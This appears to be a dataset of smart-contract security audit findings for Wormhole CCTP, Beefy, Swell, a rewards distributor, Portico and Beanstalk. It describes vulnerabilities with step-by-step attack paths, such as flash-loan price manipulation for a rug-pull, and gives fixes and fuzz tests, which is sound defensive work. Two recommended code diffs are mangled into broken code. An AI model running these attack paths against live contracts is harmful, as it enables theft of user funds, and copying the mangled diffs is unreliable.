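A sketch of what such an action could look like, reusing the setters from `registerEmitterAndDomain` (VAA parsing elided, as in the listing above):\\n```\\nfunction updateEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing and verification of Governance VAA payload */\\n\\n // the foreign chain must already be registered before it can be updated\\n require(registeredEmitters[foreignChain] != 0, "chain not registered");\\n\\n // overwrite the registered emitter for this foreign chain\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // keep both directions of the chainId <-> domain mappings consistent\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\n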
In the event an emitter is registered with an incorrect foreign chain identifier or CCTP domain, then a protocol upgrade will be required to mitigate this issue. As such, the risks associated with the deployment of protocol upgrades and the potential time-sensitive nature of this issue designate a low severity issue.\\nProof of Concept:\\nA Governance VAA erroneously registers an emitter with the incorrect foreign chain identifier.\\nA Governance upgrade is now required to re-initialize this state so that the correct foreign chain identifier can be associated with the given emitter address.
```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\n
Temporary denial-of-service when in-flight messages are not executed before a deprecated Wormhole Guardian set expires
low
Wormhole exposes a governance action in `Governance::submitNewGuardianSet` to update the Guardian set via Governance VAA.\\n```\\nfunction submitNewGuardianSet(bytes memory _vm) public {\\n // rest of code\\n\\n // Trigger a time-based expiry of current guardianSet\\n expireGuardianSet(getCurrentGuardianSetIndex());\\n\\n // Add the new guardianSet to guardianSets\\n storeGuardianSet(upgrade.newGuardianSet, upgrade.newGuardianSetIndex);\\n\\n // Makes the new guardianSet effective\\n updateGuardianSetIndex(upgrade.newGuardianSetIndex);\\n}\\n```\\n\\nWhen this function is called, `Setters:: expireGuardianSet` initiates a 24-hour timeframe after which the current guardian set expires.\\n```\\nfunction expireGuardianSet(uint32 index) internal {\\n _state.guardianSets[index].expirationTime = uint32(block.timestamp) + 86400;\\n}\\n```\\n\\nHence, any in-flight VAAs that utilize the deprecated Guardian set index will fail to be executed given the validation present in `Messages::verifyVMInternal`.\\n```\\n/// @dev Checks if VM guardian set index matches the current index (unless the current set is expired).\\nif(vm.guardianSetIndex != getCurrentGuardianSetIndex() && guardianSet.expirationTime < block.timestamp){\\n return (false, "guardian set has expired");\\n}\\n```\\n\\nConsidering there is no automatic relaying of Wormhole CCTP messages, counter to what is specified in the documentation (unless an integrator implements their own relayer), there are no guarantees that an in-flight message which utilizes an old Guardian set index will be executed by the `mintRecipient` on the target domain within its 24-hour expiration period. This could occur, for example, in cases such as:\\nIntegrator messages are blocked by their use of the Wormhole nonce/sequence number.\\nCCTP contracts are paused on the target domain, causing all redemptions to revert.\\nL2 sequencer downtime, since the Wormhole CCTP integration contracts do not consider aliased addresses for forced inclusion.\\nThe `mintRecipient` is a contract that has been paused following an exploit, temporarily restricting all incoming and outgoing transfers.\\nIn the current design, it is not possible to update the `mintRecipient` for a given deposit due to the multicast nature of VAAs. CCTP exposes `MessageTransmitter::replaceMessage` which allows the original source caller to update the destination caller for a given message and its corresponding attestation; however, the Wormhole CCTP integration currently provides no access to this function and has no similar functionality of its own to allow updates to the target `mintRecipient` of the VAA.\\nAdditionally, there is no method for forcibly executing the redemption of USDC/EURC to the `mintRecipient`, which is the only address allowed to execute the VAA on the target domain, as validated in `Logic::redeemTokensWithPayload`.\\n```\\n// Confirm that the caller is the `mintRecipient` to ensure atomic execution.\\nrequire(\\n msg.sender.toUniversalAddress() == deposit.mintRecipient, "caller must be mintRecipient"\\n);\\n```\\n\\nWithout any programmatic method for replacing expired VAAs with new VAAs signed by the updated Guardian set, the source USDC/EURC will be burnt, but it will not be possible for the expired VAAs to be executed, leading to denial-of-service on the `mintRecipient` receiving tokens on the target domain. 
The Wormhole CCTP integration does, however, inherit some mitigations already in place for this type of scenario where the Guardian set is updated, as explained in the Wormhole whitepaper, meaning that it is possible to repair or otherwise replace the expired VAA for execution using signatures from the new Guardian set. In all cases, the original VAA metadata remains intact since the new VAA Guardian signatures refer to an event that has already been emitted, so none of the contents of the VAA payload besides the Guardian set index and associated signatures change on re-observation. This means that the new VAA can be safely paired with the existing Circle attestation for execution on the target domain by the original `mintRecipient`.
The practicality of executing the proposed Governance mitigations at scale should be carefully considered, given the extent to which USDC is entrenched within the wider DeFi ecosystem. There is a high likelihood of temporary widespread, high-impact DoS, although this is somewhat limited by the understanding that Guardian set updates are expected to occur relatively infrequently, given there have only been three updates in the lifetime of Wormhole so far. There is also potentially insufficient tooling for the detailed VAA re-observation scenarios, which should handle the recombination of the signed CCTP message with the new VAA and clearly communicate these considerations to integrators.
There is only a single address that is permitted to execute a given VAA on the target domain; however, there are several scenarios that have been identified where this `mintReceipient` may be unable to perform redemption for a period in excess of 24 hours following an update to the Guardian set while the VAA is in-flight. Fortunately, Wormhole Governance has a well-defined path to resolution, so the impact is limited.\\nProof of Concept:\\nAlice burns 100 USDC to be transferred to dApp X from CCTP Domain A to CCTP Domain B.\\nWormhole executes a Governance VAA to update the Guardian set.\\n24 hours pass, causing the previous Guardian set to expire.\\ndApp X attempts to redeem 100 USDC on CCTP Domain B, but VAA verification fails because the message was signed using the expired Guardian set.\\nThe 100 USDC remains burnt and cannot be minted on the target domain by executing the attested CCTP message until the expired VAA is reobserved by members of the new Guardian set.
```\\nfunction submitNewGuardianSet(bytes memory _vm) public {\\n // rest of code\\n\\n // Trigger a time-based expiry of current guardianSet\\n expireGuardianSet(getCurrentGuardianSetIndex());\\n\\n // Add the new guardianSet to guardianSets\\n storeGuardianSet(upgrade.newGuardianSet, upgrade.newGuardianSetIndex);\\n\\n // Makes the new guardianSet effective\\n updateGuardianSetIndex(upgrade.newGuardianSetIndex);\\n}\\n```\\n
`StrategyPassiveManagerUniswap` gives ERC20 token allowances to `unirouter` but doesn't remove allowances when `unirouter` is updated
medium
`StrategyPassiveManagerUniswap` gives ERC20 token allowances to unirouter:\\n```\\nfunction _giveAllowances() private {\\n IERC20Metadata(lpToken0).forceApprove(unirouter, type(uint256).max);\\n IERC20Metadata(lpToken1).forceApprove(unirouter, type(uint256).max);\\n}\\n```\\n\\n`unirouter` is inherited from `StratFeeManagerInitializable` which has an external function `setUnirouter` which allows `unirouter` to be changed:\\n```\\n function setUnirouter(address _unirouter) external onlyOwner {\\n unirouter = _unirouter;\\n emit SetUnirouter(_unirouter);\\n}\\n```\\n\\nThe allowances can only be removed by calling `StrategyPassiveManagerUniswap::panic` however `unirouter` can be changed any time via the `setUnirouter` function.\\nThis allows the contract to enter a state where `unirouter` is updated via `setUnirouter` but the ERC20 token approvals given to the old `unirouter` are not removed.
1) Make `StratFeeManagerInitializable::setUnirouter` `virtual` such that it can be overridden by child contracts. 2) `StrategyPassiveManagerUniswap` should override `setUnirouter` to remove all allowances before calling the parent function to update `unirouter`.
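A sketch of the recommended shape, assuming `forceApprove` and the inherited `onlyOwner` modifier are available in the child contract:\\n```\\n// StratFeeManagerInitializable: allow children to override the setter\\nfunction setUnirouter(address _unirouter) external virtual onlyOwner {\\n unirouter = _unirouter;\\n emit SetUnirouter(_unirouter);\\n}\\n\\n// StrategyPassiveManagerUniswap: revoke the old router's allowances first\\nfunction setUnirouter(address _unirouter) external override onlyOwner {\\n IERC20Metadata(lpToken0).forceApprove(unirouter, 0);\\n IERC20Metadata(lpToken1).forceApprove(unirouter, 0);\\n unirouter = _unirouter;\\n emit SetUnirouter(_unirouter);\\n _giveAllowances(); // re-approve the new router\\n}\\n```\\nThe body is duplicated here rather than delegating via `super`, since internal calls to `external` functions are not permitted; making the setter `public virtual` instead would allow the override to call `super.setUnirouter(_unirouter)`.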
The old `unirouter` contract will retain the ERC20 token approvals granted by the strategy, so it can continue to spend the protocol's tokens even though the protocol has switched to a new `unirouter` and no longer intends for the old one to hold those approvals.
```\\nfunction _giveAllowances() private {\\n IERC20Metadata(lpToken0).forceApprove(unirouter, type(uint256).max);\\n IERC20Metadata(lpToken1).forceApprove(unirouter, type(uint256).max);\\n}\\n```\\n
Owner of `StrategyPassiveManagerUniswap` can rug-pull users' deposited tokens by manipulating `onlyCalmPeriods` parameters
low
While `StrategyPassiveManagerUniswap` does have some permissioned roles, one of the attack paths we were asked to check was that the permissioned roles could not rug-pull the users' deposited tokens. There is a way that the owner of the `StrategyPassiveManagerUniswap` contract could accomplish this by modifying key parameters to reduce the effectiveness of the `_onlyCalmPeriods` check. This appears to be how a similar protocol Gamma was exploited.\\nProof of Concept:\\nOwner calls `StrategyPassiveManagerUniswap::setDeviation` to increase the maximum allowed deviations to large numbers or alternatively `setTwapInterval` to decrease the twap interval rendering it ineffective\\nOwner takes a flash loan and uses it to manipulate `pool.slot0` to a high value\\nOwner calls `BeefyVaultConcLiq::deposit` to perform a deposit; the shares are calculated thus:\\n```\\n// @audit `price` is derived from `pool.slot0`\\nshares = _amount1 + (_amount0 * price / PRECISION);\\n```\\n\\nAs `price` is derived from `pool.slot0` which has been inflated, the owner will receive many more shares than they normally would\\nOwner unwinds the flash loan returning `pool.slot0` back to its normal value\\nOwner calls `BeefyVaultConcLiq::withdraw` to receive many more tokens than they should be able to due to the inflated share count they received from the deposit
Beefy already intends to have all owner functions behind a timelocked multi-sig and if these transactions are attempted the suspicious parameters would be an obvious signal that a future attack is coming. Because of this the probability of this attack being effectively executed is low though it is still possible.\\nOne way to further mitigate this attack would be to have a minimum required twap interval and maximum required deviation amounts such that the owner couldn't change these parameters to values which would enable this attack.
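One way to encode those bounds is sketched below; the constant names and values are illustrative, and the storage variable types are assumed from their usage in `_onlyCalmPeriods`:\\n```\\nuint32 constant MIN_TWAP_INTERVAL = 60; // illustrative floor in seconds\\nint56 constant MAX_ALLOWED_DEVIATION = 200; // illustrative cap in ticks\\n\\nfunction setTwapInterval(uint32 _interval) external onlyOwner {\\n require(_interval >= MIN_TWAP_INTERVAL, "interval too short");\\n twapInterval = _interval;\\n}\\n\\nfunction setDeviation(int56 _maxTickDeviationNegative, int56 _maxTickDeviationPositive) external onlyOwner {\\n require(\\n _maxTickDeviationNegative <= MAX_ALLOWED_DEVIATION &&\\n _maxTickDeviationPositive <= MAX_ALLOWED_DEVIATION,\\n "deviation too large"\\n );\\n maxTickDeviationNegative = _maxTickDeviationNegative;\\n maxTickDeviationPositive = _maxTickDeviationPositive;\\n}\\n```\\n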
Owner of `StrategyPassiveManagerUniswap` can rug-pull users' deposited tokens.
```\\n// @audit `price` is derived from `pool.slot0`\\nshares = _amount1 + (_amount0 * price / PRECISION);\\n```\\n
`_onlyCalmPeriods` does not consider MIN/MAX ticks, which can DOS deposit, withdraw and harvest in edge cases
low
In Uniswap V3, liquidity providers can only provide liquidity within the price range `[1.0001^MIN_TICK; 1.0001^MAX_TICK)`; these are therefore the minimum and maximum prices.\\n```\\n function _onlyCalmPeriods() private view {\\n int24 tick = currentTick();\\n int56 twapTick = twap();\\n\\n if(\\n twapTick - maxTickDeviationNegative > tick ||\\n twapTick + maxTickDeviationPositive < tick) revert NotCalm();\\n }\\n```\\n\\nIf `twapTick - maxTickDeviationNegative < MIN_TICK`, this function would revert even if `tick` has been the same for years. This can DoS deposits, withdrawals and harvests for as long as that state holds, even though they should be allowed.
Consider changing the current implementation to:\\n```\\n// Add the line below\\n const int56 MIN_TICK = // Remove the line below\\n887272;\\n// Add the line below\\n const int56 MAX_TICK = 887272;\\n function _onlyCalmPeriods() private view {\\n int24 tick = currentTick();\\n int56 twapTick = twap();\\n\\n// Add the line below\\n int56 minCalmTick = max(twapTick // Remove the line below\\n maxTickDeviationNegative, MIN_TICK);\\n// Add the line below\\n int56 maxCalmTick = min(twapTick // Remove the line below\\n maxTickDeviationPositive, MAX_TICK);\\n\\n if(\\n// Remove the line below\\n twapTick // Remove the line below\\n maxTickDeviationNegative > tick ||\\n// Remove the line below\\n twapTick // Add the line below\\n maxTickDeviationPositive < tick) revert NotCalm();\\n// Add the line below\\n minCalmTick > tick ||\\n// Add the line below\\n maxCalmTick < tick) revert NotCalm();\\n }\\n```\\n
null
```\\n function _onlyCalmPeriods() private view {\\n int24 tick = currentTick();\\n int56 twapTick = twap();\\n\\n if(\\n twapTick - maxTickDeviationNegative > tick ||\\n twapTick + maxTickDeviationPositive < tick) revert NotCalm();\\n }\\n```\\n
Withdraw can return zero tokens while burning a positive amount of shares
low
Invariant fuzzing found an edge-case where a user could burn an amount of shares > 0 but receive zero output tokens. The cause appears to be a rounding down to zero precision loss for small `_shares` value in `BeefyVaultConcLiq::withdraw` L220-221:\\n```\\nuint256 _amount0 = (_bal0 * _shares) / _totalSupply;\\nuint256 _amount1 = (_bal1 * _shares) / _totalSupply;\\n```\\n
Change the slippage check to also revert if no output tokens are returned:\\n```\\nif (_amount0 < _minAmount0 || _amount1 < _minAmount1 ||\\n (_amount0 == 0 && _amount1 == 0)) revert TooMuchSlippage();\\n```\\n
Protocol can enter a state where a user burns their shares but receives zero output tokens in return.\\nProof of Concept: Invariant fuzz testing suite supplied at the conclusion of the audit.
```\\nuint256 _amount0 = (_bal0 * _shares) / _totalSupply;\\nuint256 _amount1 = (_bal1 * _shares) / _totalSupply;\\n```\\n
`SwellLib.BOT` can subtly rug-pull withdrawals by setting `_processedRate = 0` when calling `swEXIT::processWithdrawals`
medium
When users create a withdrawal request, their `swETH` is burned then the current exchange rate `rateWhenCreated` is fetched from swETH::swETHToETHRate:\\n```\\nuint256 rateWhenCreated = AccessControlManager.swETH().swETHToETHRate();\\n```\\n\\nHowever `SwellLib.BOT` can pass an arbitrary value for `_processedRate` when calling swEXIT::processWithdrawals:\\n```\\nfunction processWithdrawals(\\n uint256 _lastTokenIdToProcess,\\n uint256 _processedRate\\n) external override checkRole(SwellLib.BOT) {\\n```\\n\\nThe final rate used is the lesser of `rateWhenCreated` and _processedRate:\\n```\\nuint256 finalRate = _processedRate > rateWhenCreated\\n ? rateWhenCreated\\n : _processedRate;\\n```\\n\\nThis final rate is multiplied by the requested withdrawal amount to determine the actual amount sent to the user requesting a withdrawal:\\n```\\nuint256 requestExitedETH = wrap(amount).mul(wrap(finalRate)).unwrap();\\n```\\n\\nHence `SwellLib.BOT` can subtly rug-pull all withdrawals by setting `_processedRate = 0` when calling `swEXIT::processWithdrawals`.
Two possible mitigations:\\nChange `swEXIT::processWithdrawals` to always fetch the current rate from `swETH::swETHToETHRate`\\nOnly allow `swEXIT::processWithdrawals` to be called by the `RepricingOracle` contract which calls it correctly.
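A sketch of the first option, where the rate is always read on-chain rather than supplied by the caller (the `_processedRate` parameter is removed):\\n```\\nfunction processWithdrawals(\\n uint256 _lastTokenIdToProcess\\n) external checkRole(SwellLib.BOT) {\\n // fetch the live rate instead of trusting a caller-supplied value\\n uint256 processedRate = AccessControlManager.swETH().swETHToETHRate();\\n\\n /* snip: existing processing loop, still taking the lesser of processedRate and rateWhenCreated */\\n}\\n```\\n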
null
```\\nuint256 rateWhenCreated = AccessControlManager.swETH().swETHToETHRate();\\n```\\n
Check for staleness of data when fetching Proof of Reserves via Chainlink `Swell ETH PoR` Oracle
low
`RepricingOracle::_assertRepricingSnapshotValidity` uses the `Swell ETH PoR` Chainlink Proof of Reserves Oracle as an off-chain data source for Swell's current reserves.\\nThe `Swell ETH PoR` Oracle is listed on Chainlink's website as having a heartbeat of `86400` seconds (check the "Show More Details" box in the top-right corner of the table); however, no staleness check is implemented by `RepricingOracle`:\\n```\\n// @audit no staleness check\\n(, int256 externallyReportedV3Balance, , , ) = AggregatorV3Interface(\\n ExternalV3ReservesPoROracle\\n).latestRoundData();\\n```\\n
Implement a staleness check and if the Oracle is stale, either revert or skip using it as the code currently does if the oracle is not set.\\nFor multi-chain deployments ensure that a correct staleness check is used for each feed as the same feed can have different heartbeats on different chains.\\nConsider adding an off-chain bot that periodically checks if the Oracle has become stale and if it has, raises an internal alert for the team to investigate.
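A sketch of such a check, assuming an illustrative `MAX_STALENESS` constant matching the feed's heartbeat on the deployment chain:\\n```\\nuint256 constant MAX_STALENESS = 86400; // heartbeat of the mainnet Swell ETH PoR feed\\n\\n(, int256 externallyReportedV3Balance, , uint256 updatedAt, ) = AggregatorV3Interface(\\n ExternalV3ReservesPoROracle\\n).latestRoundData();\\n\\nif (block.timestamp - updatedAt > MAX_STALENESS) {\\n // stale: either revert, or skip the external reserves check as is done when the oracle is unset\\n}\\n```\\n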
If the `Swell ETH PoR` Chainlink Proof Of Reserves Oracle has stopped functioning correctly, `RepricingOracle::_assertRepricingSnapshotValidity` will continue processing with stale reserve data as if it were fresh.
```\\n// @audit no staleness check\\n(, int256 externallyReportedV3Balance, , , ) = AggregatorV3Interface(\\n ExternalV3ReservesPoROracle\\n).latestRoundData();\\n```\\n
Precision loss in `swETH::_deposit` from unnecessary hidden division before multiplication
low
`swETH::_deposit` L170 contains a hidden unnecessary division before multiplication as the call to `_ethToSwETHRate` performs a division which then gets multiplied by msg.value:\\n```\\nuint256 swETHAmount = wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// @audit expanding this out\\n// wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// wrap(msg.value).mul(wrap(1 ether).div(_swETHToETHRate())).unwrap();\\n```\\n\\nThis issue has not been introduced in the new changes but is in the mainnet code.
Refactor to perform multiplication before division:\\n```\\nuint256 swETHAmount = wrap(msg.value).mul(wrap(1 ether)).div(_swETHToETHRate()).unwrap();\\n```\\n
Slightly less `swETH` will be minted to depositors. While the amount by which individual depositors are short-changed is individually small, the effect is cumulative and increases as depositors and deposit size increase.\\nProof of Concept: This stand-alone stateless fuzz test can be run inside Foundry to prove this as well as provided hard-coded test cases:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.23;\\n\\nimport {UD60x18, wrap} from "@prb/math/src/UD60x18.sol";\\n\\nimport "forge-std/Test.sol";\\n\\n// run from base project directory with:\\n// (fuzz test) forge test --match-test FuzzMint -vvv\\n// (hardcoded) forge test --match-test HardcodedMint -vvv\\ncontract MintTest is Test {\\n\\n uint256 private constant SWETH_ETH_RATE = 1050754209601187151; //as of 2024-02-15\\n\\n function _mintOriginal(uint256 inputAmount) private pure returns(uint256) {\\n // hidden division before multiplication\\n // wrap(inputAmount).mul(_ethToSwETHRate()).unwrap();\\n // wrap(inputAmount).mul(wrap(1 ether).div(_swETHToETHRate())).unwrap()\\n\\n return wrap(inputAmount).mul(wrap(1 ether).div(wrap(SWETH_ETH_RATE))).unwrap();\\n }\\n\\n function _mintFixed(uint256 inputAmount) private pure returns(uint256) {\\n // refactor to perform multiplication before division\\n // wrap(inputAmount).mul(wrap(1 ether)).div(_swETHToETHRate()).unwrap();\\n\\n return wrap(inputAmount).mul(wrap(1 ether)).div(wrap(SWETH_ETH_RATE)).unwrap();\\n }\\n\\n function test_FuzzMint(uint256 inputAmount) public pure {\\n uint256 resultOriginal = _mintOriginal(inputAmount);\\n uint256 resultFixed = _mintFixed(inputAmount);\\n\\n assert(resultOriginal == resultFixed);\\n }\\n\\n function test_HardcodedMint() public {\\n // found by fuzzer\\n console.log(_mintFixed(3656923177187149889) - _mintOriginal(3656923177187149889)); // 1\\n\\n // 100 eth\\n console.log(_mintFixed(100 ether) - _mintOriginal(100 ether)); // 21\\n\\n // 1000 eth\\n console.log(_mintFixed(1000 ether) - _mintOriginal(1000 ether)); // 215\\n\\n // 10000 eth\\n console.log(_mintFixed(10000 ether) - _mintOriginal(10000 ether)); // 2159\\n }\\n}\\n```\\n
```\\nuint256 swETHAmount = wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// @audit expanding this out\\n// wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// wrap(msg.value).mul(wrap(1 ether).div(_swETHToETHRate())).unwrap();\\n```\\n
Attacker can abuse `RewardsDistributor::triggerRoot` to block reward claims and unpause a paused state
medium
Consider the code of RewardsDistributor::triggerRoot:\\n```\\n function triggerRoot() external {\\n bytes32 rootCandidateAValue = rootCandidateA.value;\\n if (rootCandidateAValue != rootCandidateB.value || rootCandidateAValue == bytes32(0)) revert RootCandidatesInvalid();\\n root = Root({value: rootCandidateAValue, lastUpdatedAt: block.timestamp});\\n emit RootChanged(msg.sender, rootCandidateAValue);\\n }\\n```\\n\\nThis function:\\ncan be called by anyone\\nif it succeeds, sets `root.value` to `rootCandidateA.value` and `root.lastUpdatedAt` to `block.timestamp`\\ndoesn't reset `rootCandidateA` or `rootCandidateB`, so it can be called over and over again to continually update `root.lastUpdatedAt` or to set `root.value` to `rootCandidateA.value`.
Two possible options:\\nMake `RewardsDistributor::triggerRoot` a permissioned function such that an attacker can't call it\\nChange `RewardsDistributor::triggerRoot` to reset `rootCandidateA.value = zeroRoot` such that it can't be successfully called repeatedly.
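A sketch of the second option, consuming candidate A so that a repeated call fails the existing validity check (`zeroRoot` is the same sentinel used when pausing claims):\\n```\\nfunction triggerRoot() external {\\n bytes32 rootCandidateAValue = rootCandidateA.value;\\n if (rootCandidateAValue != rootCandidateB.value || rootCandidateAValue == bytes32(0)) revert RootCandidatesInvalid();\\n root = Root({value: rootCandidateAValue, lastUpdatedAt: block.timestamp});\\n // consume the candidate so a second call reverts with RootCandidatesInvalid\\n rootCandidateA.value = zeroRoot;\\n emit RootChanged(msg.sender, rootCandidateAValue);\\n}\\n```\\n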
An attacker can abuse this function in 2 ways:\\nby calling it repeatedly an attacker can continually increase `root.lastUpdatedAt` to trigger the claim delay revert in `RewardsDistributor::claimAll` effectively blocking reward claims\\nby calling it after reward claims have been paused, an attacker can effectively unpause the paused state since `root.value` is over-written with the valid value from `rootCandidateA.value` and claim pausing works by setting `root.value == zeroRoot`.
```\\n function triggerRoot() external {\\n bytes32 rootCandidateAValue = rootCandidateA.value;\\n if (rootCandidateAValue != rootCandidateB.value || rootCandidateAValue == bytes32(0)) revert RootCandidatesInvalid();\\n root = Root({value: rootCandidateAValue, lastUpdatedAt: block.timestamp});\\n emit RootChanged(msg.sender, rootCandidateAValue);\\n }\\n```\\n
`RewardsDistributor` doesn't correctly handle deposits of fee-on-transfer incentive tokens
medium
`the kenneth` stated in Telegram that Fee-On-Transfer tokens are fine to use as incentive tokens with `RewardsDistributor`; however, when Fee-On-Transfer tokens are received, the stored reward amount does not account for the fee deducted from the transfer amount in-transit, for example:\\n```\\nfunction _depositLPIncentive(\\n StoredReward memory reward,\\n uint256 amount,\\n uint256 periodReceived\\n) private {\\n IERC20(reward.token).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n\\n // @audit stored `amount` here will be incorrect since it doesn't account for\\n // the actual amount received after the transfer fee was deducted in-transit\\n _storeReward(periodReceived, reward, amount);\\n}\\n```\\n
In `RewardsDistributor::_depositLPIncentive` & depositVoteIncentive:\\nread the `before` transfer token balance of `RewardsDistributor` contract\\nperform the token transfer\\nread the `after` transfer token balance of `RewardsDistributor` contract\\ncalculate the difference between the `after` and `before` balances to get the true amount that was received by the `RewardsDistributor` contract accounting for the fee that was deducted in-transit\\nuse the true received amount to generate events and write the received incentive token amounts to `RewardsDistributor::periodRewards`.\\nAlso note that `RewardsDistributor::periodRewards` is never read in the contract, only written to. If it is not used by off-chain processing then consider removing it.
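A sketch of the balance-delta pattern applied to `_depositLPIncentive` (the same applies to `depositVoteIncentive`):\\n```\\nfunction _depositLPIncentive(\\n StoredReward memory reward,\\n uint256 amount,\\n uint256 periodReceived\\n) private {\\n uint256 balanceBefore = IERC20(reward.token).balanceOf(address(this));\\n\\n IERC20(reward.token).safeTransferFrom(msg.sender, address(this), amount);\\n\\n // the true amount received, net of any fee deducted in-transit\\n uint256 received = IERC20(reward.token).balanceOf(address(this)) - balanceBefore;\\n\\n _storeReward(periodReceived, reward, received);\\n}\\n```\\n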
The actual reward calculation is done off-chain; it is outside the audit scope and we have no visibility of that code. However, the events emitted by `RewardsDistributor` and the incentive token deposits stored in `RewardsDistributor::periodRewards` use incorrect amounts for Fee-On-Transfer incentive token deposits.
```\\nfunction _depositLPIncentive(\\n StoredReward memory reward,\\n uint256 amount,\\n uint256 periodReceived\\n) private {\\n IERC20(reward.token).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n\\n // @audit stored `amount` here will be incorrect since it doesn't account for\\n // the actual amount received after the transfer fee was deducted in-transit\\n _storeReward(periodReceived, reward, amount);\\n}\\n```\\n
Use low level `call()` to prevent gas griefing attacks when returned data not required
low
Using `call()` when the returned data is not required unnecessarily exposes the contract to gas griefing attacks via a huge returned data payload. For example:\\n```\\n(bool sent, ) = _to.call{value: _amount}("");\\nrequire(sent);\\n```\\n\\nIs the same as writing:\\n```\\n(bool sent, bytes memory data) = _to.call{value: _amount}("");\\nrequire(sent);\\n```\\n\\nIn both cases the returned data will be copied into memory, exposing the contract to gas griefing attacks, even though the returned data is not used at all.
Use a low-level call when the returned data is not required, eg:\\n```\\nbool sent;\\nassembly {\\n sent := call(gas(), _to, _amount, 0, 0, 0, 0)\\n}\\nif (!sent) revert FailedToSendEther();\\n```\\n
Contract unnecessarily exposed to gas griefing attacks.
```\\n(bool sent, ) = _to.call{value: _amount}("");\\nrequire(sent);\\n```\\n
No precision scaling or minimum received amount check when subtracting `relayerFeeAmount` can revert due to underflow or return less tokens to user than specified
medium
`PorticoFinish::payOut` L376 attempts to subtract the `relayerFeeAmount` from the final post-bridge and post-swap token balance:\\n```\\nfinalUserAmount = finalToken.balanceOf(address(this)) - relayerFeeAmount;\\n```\\n\\nThere is no precision scaling to ensure that PorticoFinish's token contract balance and `relayerFeeAmount` are in the same decimal precision; if the `relayerFeeAmount` has 18 decimal places but the token is USDC with only 6 decimal places, this can easily revert due to underflow, resulting in the bridged tokens being stuck.\\nAn excessively high `relayerFeeAmount` could also significantly reduce the amount of post-bridge and post-swap tokens received, as there is no check on the minimum amount of tokens the user will receive after deducting `relayerFeeAmount`. This configuration is an example of the "MinTokensOut For Intermediate, Not Final Amount" vulnerability class; since the minimum received tokens check occurs before the deduction of `relayerFeeAmount`, a user will always receive fewer tokens than their specified minimum if `relayerFeeAmount > 0`.
Ensure that token balance and `relayerFeeAmount` have the same decimal precision before combining them. Alternatively check for underflow and don't charge a fee if this would be the case. Consider enforcing the user-specified minimum output token check again when deducting `relayerFeeAmount`, and if this would fail then decrease `relayerFeeAmount` such that the user at least receives their minimum specified token amount.\\nAnother option is to check that even if it doesn't underflow, that the remaining amount after subtracting `relayerFeeAmount` is a high percentage of the bridged amount; this would prevent a scenario where `relayerFeeAmount` takes a large part of the bridged amount, effectively capping `relayerFeeAmount` to a tiny % of the post-bridge and post-swap funds. This scenario can still result in the user receiving less tokens than their specified minimum however.\\nFrom the point of view of the smart contract, it should protect itself against the possibility of the token amount and `relayerFeeAmount` being in different decimals or that `relayerFeeAmount` would be too high, similar to how for example L376 inside `payOut` doesn't trust the bridge reported amount and checks the actual token balance.
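A sketch of one possible guard that caps the fee instead of underflowing, assuming the fee and balance have first been normalised to the same decimals; `MAX_FEE_BPS` is illustrative:\\n```\\nuint256 constant MAX_FEE_BPS = 100; // illustrative cap: fee may take at most 1% of the bridged amount\\n\\nuint256 balance = finalToken.balanceOf(address(this));\\nuint256 maxFee = (balance * MAX_FEE_BPS) / 10_000;\\nuint256 fee = relayerFeeAmount > maxFee ? maxFee : relayerFeeAmount;\\nfinalUserAmount = balance - fee; // can no longer underflow\\n```\\n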
Bridged tokens stuck or user receives less tokens than their specified minimum.
```\\nfinalUserAmount = finalToken.balanceOf(address(this)) - relayerFeeAmount;\\n```\\n
Use low level `call()` to prevent gas griefing attacks when returned data not required
low
Using `call()` when the returned data is not required unnecessarily exposes the contract to gas griefing attacks via a huge returned data payload. For example:\\n```\\n(bool sentToUser, ) = recipient.call{ value: finalUserAmount }("");\\nrequire(sentToUser, "Failed to send Ether");\\n```\\n\\nIs the same as writing:\\n```\\n(bool sentToUser, bytes memory data) = recipient.call{ value: finalUserAmount }("");\\nrequire(sentToUser, "Failed to send Ether");\\n```\\n\\nIn both cases the returned data will be copied into memory, exposing the contract to gas griefing attacks, even though the returned data is not used at all.
Use a low-level call when the returned data is not required, eg:\\n```\\nbool sent;\\nassembly {\\n sent := call(gas(), recipient, finalUserAmount, 0, 0, 0, 0)\\n}\\nif (!sent) revert Unauthorized();\\n```\\n\\nConsider using ExcessivelySafeCall.
Contract unnecessarily exposed to gas griefing attacks.
```\\n(bool sentToUser, ) = recipient.call{ value: finalUserAmount }("");\\nrequire(sentToUser, "Failed to send Ether");\\n```\\n
The previous milestone stem should be scaled for use with the new gauge point system which uses untruncated values moving forward
high
Within the Beanstalk Silo, the milestone stem for a given token is the cumulative amount of grown stalk per BDV for this token at the last `stalkEarnedPerSeason` update. Previously, the milestone stem was stored in its truncated representation; however, the seed gauge system now stores the value in its untruncated form due to the new granularity of grown stalk and the frequency with which these values are updated.\\nAt the time of upgrade, the previous (truncated) milestone stem for each token should be scaled for use with the gauge point system by multiplying up by a factor of `1e6`. Otherwise, there will be a mismatch in decimals when calculating the stem tip.\\n```\\n_stemTipForToken = s.ss[token].milestoneStem +\\n int96(s.ss[token].stalkEarnedPerSeason).mul(\\n int96(s.season.current).sub(int96(s.ss[token].milestoneSeason))\\n );\\n```\\n
Scale up the existing milestone stem for each token:\\n```\\nfor (uint i = 0; i < siloTokens.length; i++) {\\n// Add the line below\\n s.ss[siloTokens[i]].milestoneStem = int96(s.ss[siloTokens[i]].milestoneStem.mul(1e6));\\n}\\n```\\n
